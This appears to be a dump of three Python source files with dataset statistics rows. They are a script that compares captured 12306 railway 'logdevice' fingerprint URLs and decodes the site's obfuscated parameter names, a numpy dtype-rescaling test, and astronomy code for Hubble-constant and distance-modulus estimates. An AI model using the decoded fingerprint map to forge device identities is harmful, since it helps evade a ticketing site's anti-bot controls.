# 字段字典转set集合去重得到差异性字段
diff_query_names_list = []
exclude_query_names_list = ['timestamp']
for query_param_name in query_param_dict:
diff_param_value_set = set(query_param_dict.get(query_param_name))
if len(diff_param_value_set) > 1 and (query_param_name not in exclude_query_names_list):
diff_query_names_list.append(query_param_name)
# 查找差异性字段在原标题中的顺序
diff_query_names_index_list = []
for diff_query_name in diff_query_names_list:
for query_name_index, query_name in enumerate(query_names_list):
if diff_query_name == query_name:
diff_query_names_index_list.append(query_name_index)
break
# 翻译差异性标题
diff_query_names_title_list = []
for diff_query_names in diff_query_names_list:
diff_query_names_title = code_name_relation_map.get(diff_query_names) or diff_query_names
diff_query_names_title_list.append(diff_query_names_title)
# 查找差异性数据
diff_query_names_data_list = []
for query_value in query_values_list:
diff_query_names_data_item_list = []
for diff_query_names_index in diff_query_names_index_list:
diff_query_names_data_item_list.append(query_value[diff_query_names_index])
diff_query_names_data_list.append(diff_query_names_data_item_list)
# 美化展示请求参数
table = show_with_prettytable(diff_query_names_title_list,diff_query_names_data_list)
print('>>>表格化展示差异性参数<<<')
print(table)
print()
def main():
# 原始 get 参数 url 链接
urls = '''
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581465946282
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466048309
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466073940
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466097372
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466118828
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466153163
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581473766043
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581473820005
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581474320091
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581501834959
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581501961805
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=t8mrq_YnAbyQUU7lmiJFNOysQGlKAykjpl6Kp_R4PXw&FMQw=0&q4f3=zh-CN&VySQ=FGHCXcWAgMnEuDfL881oOTbrF1iJfANK&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581508561749
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581508957149
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=MFjuxmgU5M&hashCode=Obi2jdJnLWjGFx-xg8YrzljCaNGizhOypETrKR_L1JM&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581509113202
'''
code_name_relation_map = {
"FMQw": "adblock",
"TeRS": "scrAvailSize",
"qBVW": "appMinorVersion",
"qmyu": "scrColorDepth",
"hLzX": "userLanguage",
"j5po": "hasLiedLanguages",
"e6OK": "systemLanguage",
"5Jwy": "scrHeight",
"ks0Q": "plugins",
"kU5z": "historyList",
"Fvje": "storeDb",
"q5aJ": "timeZone",
"qT7b": "appcodeName",
"3neK": "hasLiedResolution",
"2xC5": "hasLiedBrowser",
"VEek": "doNotTrack",
"3sw-": "indexedDb",
"jp76": "mimeTypes",
"VPIf": "cookieEnabled",
"9vyE": "online",
"-UVA": "browserName",
"88tV": "scrAvailHeight",
"E-lJ": "scrAvailWidth",
"VySQ": "cookieCode",
"ci5c": "hasLiedOs",
"0aew": "userAgent",
"3jCe": "scrDeviceXDPI",
"E3gR": "webSmartID",
"Md7A": "cpuClass",
"XM7l": "localStorage",
"ssI5": "scrWidth",
"EOQP": "jsFonts",
"d435": "browserVersion",
"lEnu": "localCode",
"hAqN": "os",
"V8vl": "openDatabase",
"q4f3": "browserLanguage",
"dzuS": "flashVersion",
"tOHY": "srcScreenSize",
"yD16": "javaEnabled",
"wNLf": "touchSupport",
"HVia": "sessionStorage"
}
filter_diff_urls_with_query_params(urls,code_name_relation_map=code_name_relation_map)
if __name__ == '__main__':
main() | 58.315315 | 674 | 0.752665 | 2,372 | 19,419 | 5.950253 | 0.137015 | 0.026924 | 0.02579 | 0.017004 | 0.79205 | 0.74125 | 0.712059 | 0.705966 | 0.703202 | 0.703202 | 0 | 0.214159 | 0.127144 | 19,419 | 333 | 675 | 58.315315 | 0.618525 | 0.029301 | 0 | 0.316742 | 0 | 0.067873 | 0.581117 | 0.012204 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049774 | false | 0 | 0.013575 | 0 | 0.085973 | 0.126697 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db678c68cea96011693634cdb96bb6e2ceef39e7 | 1,556 | py | Python | testArray/testArray.py | mrkraimer/testPvaPy | 7d09095bc76bf0a86d8d664c85757ab8369485c8 | [
"MIT"
] | null | null | null | testArray/testArray.py | mrkraimer/testPvaPy | 7d09095bc76bf0a86d8d664c85757ab8369485c8 | [
"MIT"
] | 1 | 2020-07-18T19:50:51.000Z | 2020-07-19T09:58:16.000Z | testArray/testArray.py | mrkraimer/testPvaPy | 7d09095bc76bf0a86d8d664c85757ab8369485c8 | [
"MIT"
] | 2 | 2020-07-18T18:06:57.000Z | 2020-09-10T06:40:34.000Z | import numpy as np
print('first try int16')
values = (-128,-1,0,1,127)
data = np.array(values,dtype=np.int8)
print('int8=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,255.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint8)
print('uint8=',data)
print('\nnow try int16')
values = (-32768,-256,0,256,32767)
data = np.array(values,dtype=np.int16)
print('int16=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,65535.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint16)
print('uint16=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,255.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint8)
print('uint8=',data)
print('\nnow try int32')
values = (-2147483648,-65536,0,65536,2147483647)
#data = np.array(values,dtype=np.int32)
print('int32=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,4294967295.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint32)
print('uint32=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,255.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint8)
print('uint8=',data)
| 26.827586 | 48 | 0.676093 | 264 | 1,556 | 3.984848 | 0.155303 | 0.114068 | 0.114068 | 0.076046 | 0.80038 | 0.80038 | 0.731939 | 0.731939 | 0.731939 | 0.731939 | 0 | 0.089172 | 0.091902 | 1,556 | 57 | 49 | 27.298246 | 0.655343 | 0.152956 | 0 | 0.617021 | 0 | 0 | 0.071701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.021277 | 0.234043 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db86af736e85f69e1c2207ea7054ba50c092dc1c | 10,014 | py | Python | euclidIR/dist.py | sdhawan21/euclidIR | 15b3e8ba1a033ac6a1d80ea1a1a33176fa0633d3 | [
"MIT"
] | null | null | null | euclidIR/dist.py | sdhawan21/euclidIR | 15b3e8ba1a033ac6a1d80ea1a1a33176fa0633d3 | [
"MIT"
] | null | null | null | euclidIR/dist.py | sdhawan21/euclidIR | 15b3e8ba1a033ac6a1d80ea1a1a33176fa0633d3 | [
"MIT"
] | null | null | null | from scipy.interpolate import interp1d
import numpy as np
rn=np.random.normal
c=2.997924562e5
def h0_sne(M, zp):
"""
Hubble constant from SNe observed in different passbands
"""
val=M+25-zp
h0=pow(10, 0.2*val)
return h0
def h0_mc(M, zp, n):
"""
Monte carlo to estimate H0 given the absolute magnitude the SNae zero point in a given filter for an Sn (with n realizations )
"""
arr=np.array([h0_sne(rn(M[0], M[1]), rn(zp[0], zp[1])) for k in range(n)])
return np.mean(arr), np.std(arr)
def h0_withcosm(dl, z, om=0.27, ol=0.73):
"""
Using the complete expression for h0 with values of omega_m and omega_lambda, for low z this approaches the nocosm value
om=0.27, ol=0.73 default
"""
q0=(om/2)-ol
a=z*(1-q0)/(np.sqrt(1+2*q0*z)+1+q0*z )
h0=(1+a)*c*z/dl
return h0
def h0_nocosm(dl, z):
return c*z/dl
def arr_crt(fil1, fil2):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string')
a2=np.loadtxt(fil2, dtype='string')
arr1=[float(i[1]) for i in a1 if i[0] in a2[:,0]]
arr2=[float(a2[a2[:,0]==i[0]][0][1]) for i in a1 if i[0] in a2[:,0] ]
return arr1, arr2
def lum_dist(z, om=0.27, ol=0.73, h0=70):
q0=(om/2)-ol
a=z*(1-q0)/(np.sqrt(1+2*q0*z)+1+q0*z )
dl=(1+a)*c*z/h0
return dl
WM=0.27
WV=0.73
WK=1-WM-WV
H0=70
WR=0
c = 299792.458
def mod(z):
az = 1.0/(1+1.0*z)
age = 0
n=1000
DTT = 0.0
DCMR = 0.0
for i in range(n):
a = az+(1-az)*(i+0.5)/n
adot = np.sqrt(WK+(WM/a)+(WR/(a*a))+(WV*a*a))
DTT = DTT + 1./adot
DCMR = DCMR + 1./(a*adot)
DTT = (1.-az)*DTT/n
DCMR = (1.-az)*DCMR/n
DCMR_Mpc = (c/H0)*DCMR
ratio = 1.00
x = np.sqrt(abs(WK))*DCMR
if x > 0.1:
if WK > 0:
ratio = 0.5*(np.exp(x)-np.exp(-x))/x
else:
ratio = np.sin(x)/x
else:
y = x*x
if WK < 0: y = -y
ratio = 1. + y/6. + y*y/120.
DCMT = ratio*DCMR
DA = az*DCMT
DL = DA/(az*az)
DL_Mpc = (c/H0)*DL
mu=5*np.log10(DL_Mpc)+25
return mu
"""
All array creation functions below
"""
def rev_arr_crt(fil1, fil2, n):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
nm=np.array([i[0][:-1] for i in a2])
arr1=[i[n][2:6] for i in a1 if 'SN'+i[0][:-1] in nm]
arr2=[float(a2[nm=='SN'+i[0][:-1]][0][3]) for i in a1 if 'SN'+i[0][:-1] in nm ]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
f1.append(float(arr1[k]))
f2.append(float(arr2[k]))
except:
arr1[k]
return np.array(f1), np.array(f2)
def self_arr_crt(fil1, fil2, n, n1):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
#nm=np.array([i[0][:-1] for i in a2])
arr1=[i[n][2:6] for i in a1 if i[0] in a2[:,0]]
arr2=[a2[a2[:,0]==i[0]][0][n1][2:6] for i in a1 if i[0] in a2[:,0] ]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
finp=float(arr1[k])
finp2=float(arr2[k])
f1.append(finp)
f2.append(finp2)
except:
arr1[k]
return np.array(f1), np.array(f2)
def dm_arr_crt(fil1, fil2, n, n1):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#print dm[:,0], a2[:,0]
#nm=np.array([i[0][:-1] for i in a2])
arr1=[]; arr2=[]
for i in a1:
if i[0] in a2[:,0]:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr1.append([i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
arr2.append([a2[a2[:,0]==i[0]][0][n1][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr1.append([i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
arr2.append([a2[a2[:,0]==i[0]][0][n1][2:6], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
except:
i[0]
#arr1=[i[n][2:6] for i in a1 if i[0] in a2[:,0] ]
#arr1=[[i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
#arr2=[[a2[a2[:,0]==i[0]][0][n1][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
finp=float(arr1[k][0])-float(arr1[k][1])
finp2=float(arr2[k][0])-float(arr2[k][1])
f1.append(finp)
f2.append(finp2)
except:
arr1[k]
return np.array(f1), np.array(f2)
def mix_arr_crt(fil1, fil2, n, n1):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#print dm[:,0]
#nm=np.array([i[0][:-1] for i in a2])
if n % 2 == 1:
arr1=[]; arr2=[]
for i in a1:
if i[0] in a2[:,0]:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr1.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr1.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
arr2.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
#arr1=[[i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
#arr2=[a2[a2[:,0]==i[0]][0][n1][2:6] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
elif n % 2 == 0:
arr1=[]; arr2=[]
for i in a1:
if i[0] in a2[:,0]:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
#arr2=[[i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
#arr1=[a2[a2[:,0]==i[0]][0][n1][2:6] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
if n % 2 == 1:
finp=float(arr1[k][0])-float(arr1[k][1])
finp2=float(arr2[k])
elif n % 2 == 0:
finp=float(arr1[k])
finp2=float(arr2[k][0])-float(arr2[k][1])
f1.append(finp)
f2.append(finp2)
except:
arr1[k]
return np.array(f1), np.array(f2)
def dm1_arr_crt(fil1, n):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
#a2=np.loadtxt(fil2, dtype='string', delimiter='&')
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
arr1=[]; arr2=[]
for i in a1:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([float(i[n][2:7]), float(dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][3][1:-1])])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([float(i[n][2:7]), float(dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][3][1:-1])])
#arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
#print dm[:,0]
#nm=np.array([i[0][:-1] for i in a2])
arr2=np.array(arr2)
return arr2[:,0].astype('float32'), arr2[:,1].astype('float32')
def tl_arr_crt(n, par):
a1=np.loadtxt('../files/lira_tab.tex', dtype='string', delimiter='&')
arr2=[]
print par
if par[0] == 't':
ff=np.loadtxt('../files/mod_tabJ-exp.tex', dtype='string', delimiter='&')
for i in a1:
try:
if i[0][:-1]+' ' in ff[:,0]:
print ff[ff[:,0]==i[0][:-1]+' '][0][n][2:6]
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-1]+' '][0][n][2:6])])
elif i[0][:-2]+' ' in ff[:,0]:
print ff[ff[:,0]==i[0][:-2]+' '][0][n][1:-1]
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-2]+' '][0][n][2:6])])
except:
i[0]
elif par == 'Dm15':
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#arr2=[]
for i in a1:
try:
#print i[0], dm[0][0]
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][3][1:-1])])
